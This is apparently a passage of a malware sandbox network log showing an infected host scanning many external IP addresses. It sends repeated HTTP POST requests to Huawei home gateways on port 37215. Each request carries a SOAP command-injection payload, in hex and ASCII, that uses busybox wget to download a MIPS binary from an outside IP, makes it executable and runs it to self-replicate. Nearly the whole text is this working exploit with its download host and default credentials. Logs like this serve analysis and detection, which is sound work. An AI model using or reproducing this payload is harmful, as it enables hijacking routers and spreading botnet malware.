                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  786192.168.2.1333428157.109.51.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358469963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  787192.168.2.1359928197.33.128.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358469963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  788192.168.2.1344760157.170.90.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358470917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  789192.168.2.135669841.125.13.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358582973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  790192.168.2.1340684157.148.41.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358594894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  791192.168.2.1349284139.206.36.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358599901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  792192.168.2.134989041.245.223.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358604908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  793192.168.2.1342856157.151.167.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358594894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  794192.168.2.135618441.147.72.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358623028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  795192.168.2.1344312157.38.29.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.358624935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 